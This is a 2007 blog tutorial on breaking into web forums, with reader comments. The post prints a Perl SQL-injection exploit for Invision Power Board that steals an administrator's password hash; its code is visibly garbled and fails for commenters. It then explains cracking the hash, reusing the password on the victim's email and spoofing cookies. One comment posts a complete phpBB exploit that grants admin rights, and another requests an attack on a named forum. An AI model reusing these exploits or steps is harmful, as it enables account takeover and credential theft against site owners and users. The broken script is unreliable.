Disclaimer

These articles are intended for IT Professionals and systems administrators with experience servicing computer hardware. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. We are not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

How to Hack into Forums  


This Website has been moved to a new Domain

Friday, November 16, 2007
Learn How To Hack

This is what you like to call "Hacking a forum".

I call it "Cracking into a forum" ... Learn what hacking means you lazy fucks, lol...

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as "hackingsite".



So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:


CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}

}
if ( length($outputs) < member_id=" . $user . " pass_hash="">


What the fuck,Pretty confused, aren't you? What the fuck are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.

How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.

Your going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.

Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".

So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that your in, drag and drop "ipb.pl" from your desktop, into "bin".


Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...

What your going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD

Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin


Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

perl ipb.pl


So, this is what we need to do. Type the following command into your command prompt:

ipb.pl http://hackingsite.com/forum 2 1

Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.

Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.

Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash's before continuing reading.

Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!

LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.

There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Able", which is a great MD5 cracker availiable at 'http://odix.it'.

You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.

CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up

But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?

Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"


Good luck!

Link to this post

what next?

You can also bookmark this post using your favorite bookmarking service:

Rate and Review this Blog:

related posts by categories




20 comments: to “ How to Hack into Forums

  • Anonymous
    December 21, 2007 at 3:16 AM  

    I cannot seem to get it to work. I have done everything so say to do. And I am still doing something wrong. Every time i get to the very end, where i put the URL address in the command prompt, i just get the exploit giving above. Help here please.

  • otep_love
    January 22, 2008 at 6:44 PM  

    dude the perl script isn't working.....
    execution of ipb.pl aborted due to compilation errors.. I dunno perl script,or i wud hav set it rite.... :-[

  • Anonymous
    July 9, 2008 at 8:08 AM  

    question ... i am stuck at the first command prompt step.. as i enter'cd C:\Perl\bin' it gives an error stating 'The system cannot find the patch specified'

    any ideas on fixing this?

  • Anonymous
    July 18, 2008 at 4:46 PM  

    After it installs I can't find the ipb.pl anywhere my desktop.What's wrong?

  • Anonymous
    July 23, 2008 at 8:58 AM  

    I tried compiled the script with ActivePerl-5.8.8.822-MSWin32-x86-280952 But ended up with some errors. Will I need an older version to compile this? Please tell me what is the exact version this script is for

  • Jimmi.
    August 1, 2008 at 12:42 AM  

    Once you copy and paste that on to Notepad [note don't copy CODE copy everything below that, is the actual code] you save it as ipb.pl to your Desktop for easy access. Too bad I don't know Perl so I could fix the fucking code.

  • Anonymous
    August 3, 2008 at 11:34 AM  

    "ipb.pl execution was aborted due to compilation errors"

    omfg.... HELP?

  • Anonymous
    August 3, 2008 at 6:17 PM  

    im getting same error "ipb.pl execution was aborted due to complition errors"

  • Anonymous
    August 5, 2008 at 2:32 PM  

    Hey, I copied everything under the "code" and when I try to perl it, it doesn't work, it gives me an error!

    can someone get a descriptive detail?

  • Anonymous
    August 11, 2008 at 9:55 PM  

    man..you need to teach something m ore easier than this...
    vampireturns@yahoo.com

  • ram
    August 16, 2008 at 8:53 PM  

    hey i have to install unix os.
    I am confused.
    please change this tutorial in a format that we understood.

  • Anonymous
    August 24, 2008 at 3:48 PM  

    You guys get the note "compilation error" because the script is full of errors.It's probably like this so you guys don't do anything illegal with it.Find your own working exploits...

  • Anonymous
    September 12, 2008 at 8:39 AM  

    cool thanks

  • Anonymous
    September 16, 2008 at 2:49 AM  

    This doesnt work I am stuck at
    "Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

    perl ipb.pl"
    This always gives me an error

  • Anonymous
    December 12, 2008 at 4:34 AM  

    If you can't sort this basic error out then I'm not going to bother telling you people. If you're this stupid then you don't deserve to have it work.

  • Anonymous
    December 28, 2008 at 11:27 AM  

    Here is a peri code appropraite for hacking:


    #!/usr/bin/perl -w

    # phpBB <=2.0.12 session autologin exploit
    # This script uses the vulerability in autologinid variable
    # More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
    #
    # Just gives an user on vulnerable forum administrator rights.
    # You should register the user before using this ;-)

    # by Kutas, kutas@mail15.com
    #P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
    # but greets goes to Paisterist who made an exploit for Firefox cookies...

    if (@ARGV < 3)
    {
    print q(
    +++++++++++++++++++++++++++++++++++++++++++++++++++
    Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
    i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
    ++++++++++++++++++++++++++++++++++++++++++++++++++++
    );
    exit;
    }
    use strict;
    use LWP::UserAgent;

    my $host = $ARGV[0];
    my $path = $ARGV[1];
    my $user = $ARGV[2];
    my $proxy = $ARGV[3];
    my $request = "http://";
    $request .= $host;
    $request .= $path;


    use HTTP::Cookies;
    my $browser = LWP::UserAgent->new ();
    my $cookie_jar = HTTP::Cookies->new( );
    $browser->cookie_jar( $cookie_jar );
    $cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
    if ( defined $proxy) {
    $proxy =~ s/(http:\/\/)//eg;
    $browser->proxy("http" , "http://$proxy");
    }
    print "++++++++++++++++++++++++++++++++++++\n";
    print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

    my $response = $browser->get($request);
    die "Error: ", $response->status_line
    unless $response->is_success;

    if($response->content =~ m/phpbbprivmsg/) {
    print "\n Forum is vulnerable!!!\n";
    } else {
    print "Sorry... Not vulnerable"; exit();}

    print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
    $response->content =~ /sid=([\w\d]*)/;
    my $sid = $1;

    $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
    $response = $browser->post(
    $request,
    [
    'username' => $user,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;

    if ($response->content =~ /name="u" value="([\d]*)"/)
    {print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
    else {print "No user $user found..."; exit(); }
    my $uid = $1;
    print "Trying to give user:$user admin status...\n";

    $response = $browser->post(
    $request,
    [
    'userlevel' => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> $uid,
    'submit'=> 'Submit'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;
    print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

    # milw0rm.com [2005-03-21]

  • Enigma
    January 7, 2009 at 10:07 AM  

    I get a paragraph of text saying, along with many other things, that "execution of ipb.pl aborted due to complication errors" after I enter "perl ipb.pl". Some help would be appreciated.

  • Anonymous
    March 3, 2009 at 10:02 PM  

    I have a URL to post for some of your more experienced hacks to have some fun with, they are deleting common folks posts left and right, the forum admin has run amuck with her authority, as its a small town newspaper forum. I can't get the perl thing to work, so I am asking for your assistance, pretty pretty plesee

    http://www.ozarkregionalonline.com/forums/forumdisplay.php?f=3

  • Very anonymous
    March 25, 2009 at 2:42 AM  

    "Aborted due to compilation errors."
    Can someone who got this to work (If anyone) post how? Or if the one who made this article/blog/faq/tutorial/guide/fucked-up-article/blog/faq/tutorial/guide is reading this, YOU. THIS CODE: use LWP::UserAgent;

    $ua = new LWP::UserAgent;
    $ua->agent("Mosiac 1.0" . $ua->agent);

    if (!$ARGV[0]) {$ARGV[0] = '';}
    if (!$ARGV[3]) {$ARGV[3] = '';}

    my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
    my $user = $ARGV[1]; # userid to jack
    my $iver = $ARGV[2]; # version 1 or 2
    my $cpre = $ARGV[3]; # cookie prefix
    my $dbug = $ARGV[4]; # debug?

    if (!$ARGV[2])
    {
    print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
    exit;
    }

    my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

    my $outputs = '';

    for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
    my $res = $ua->get($path, @cookie);

    # If we get a valid sql request then this
    # does not appear anywhere in the sources
    $pattern = '';

    $_ = $res->content;

    if ($dbug) { print };

    if ( !(/$pattern/) )
    {
    $outputs .= $current;
    print "$current\n";
    last;
    }

    }
    if ( length($outputs) < member_id=" . $user . " pass_hash="">. MY GRAMMAR. FIX. NOW.

    (For anyone that's confused, the ipb.pl is the (Probably-not-yet-saved) notepad file.)

  • David
    April 21, 2009 at 8:12 PM  

    execution of ipb.pl aborted due to compilation errors.. ....

 

Design by Amanda @ Blogger Buster